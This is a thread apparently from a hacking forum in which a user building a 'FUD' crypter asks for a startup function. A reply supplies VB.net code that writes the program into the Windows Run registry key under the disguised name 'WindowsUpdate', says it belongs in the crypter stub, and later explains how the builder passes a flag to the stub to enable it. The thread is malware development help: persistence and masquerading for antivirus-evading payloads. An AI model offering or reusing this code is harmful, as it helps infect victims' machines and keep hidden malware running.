• Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

[VB.net] Startup Function

Status
Not open for further replies.

Nazox

Leech
PRIV8
Joined
Jul 15, 2014
Messages
24
Reputation
0
Reaction score
285
Points
48
Credits
0
‎11 Years of Service‎
48%
Thank you to @chequinho he resolve my problem.

 
Last edited by a moderator:
Re: [VB.net] Startup Function

Wow, you made a crypter FUD and you don't know how to call a function or modify it? risad8

[LENGUAJE=vb]

Sub AddStartupCU(sKeyName As String, sPath As String)

My.Computer.Registry.CurrentUser.CreateSubKey("Software\Microsoft\Windows\CurrentVersion\Run").SetValue(sKeyName, sPath)

End Sub[/LENGUAJE]

[LENGUAJE=vb]

Call AddStartupCU("WindowsUpdate", Application.ExecutablePath)[/LENGUAJE]

Btw, this function goes in STUB, not in client :Lol

Btw2: This is incorrect section.

Regards.

 
Last edited by a moderator:
Re: [VB.net] Startup Function

Ok thank you bro, and how i can do to control it with a checkbox ?

 
Re: [VB.net] Startup Function

When you crypt the file with client, you can pass "1" or "0" to stub, and then in stub read that value so if it's "1" just call the function.

 
Re: [VB.net] Startup Function

Thank you, did you have Skype ?

 
Status
Not open for further replies.
Back
Top